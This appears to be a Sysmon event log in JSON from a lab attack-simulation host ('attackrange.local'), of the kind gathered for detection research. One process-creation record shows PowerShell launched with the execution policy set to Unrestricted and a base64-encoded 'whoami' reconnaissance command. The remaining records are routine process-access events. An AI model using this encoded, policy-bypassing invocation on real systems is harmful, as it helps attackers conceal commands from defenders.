{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2552,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F8C-5F25-0000-00105F7D0400}\r\nSourceProcessId: 4400\r\nSourceThreadId: 4420\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F8C-5F25-0000-0010C17F0400}\r\nTargetProcessId: 4472\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F8C-5F25-0000-00105F7D0400}","SourceProcessId":"4400","SourceThreadId":"4420","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-0010C17F0400}","TargetProcessId":"4472","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2553,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.257\r\nProcessGuid: {41C8662E-1F8C-5F25-0000-0010A6800400}\r\nProcessId: 4492\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-1F8C-5F25-0000-0020B17C0400}\r\nLogonId: 0x47CB1\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-1F8C-5F25-0000-0010C17F0400}\r\nParentProcessId: 4472\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.257","ProcessGuid":"{41C8662E-1F8C-5F25-0000-0010A6800400}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-1F8C-5F25-0000-0020B17C0400}","LogonId":"0x47cb1","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-1F8C-5F25-0000-0010C17F0400}","ParentProcessId":"4472","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2554,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F8C-5F25-0000-0010C17F0400}\r\nSourceProcessId: 4472\r\nSourceThreadId: 4476\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1F8C-5F25-0000-0010A6800400}\r\nTargetProcessId: 4492\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F8C-5F25-0000-0010C17F0400}","SourceProcessId":"4472","SourceThreadId":"4476","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-0010A6800400}","TargetProcessId":"4492","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2555,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F8C-5F25-0000-0010A6800400}\r\nTargetProcessId: 4492\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-0010A6800400}","TargetProcessId":"4492","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2556,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2557,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2558,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2559,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2560,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
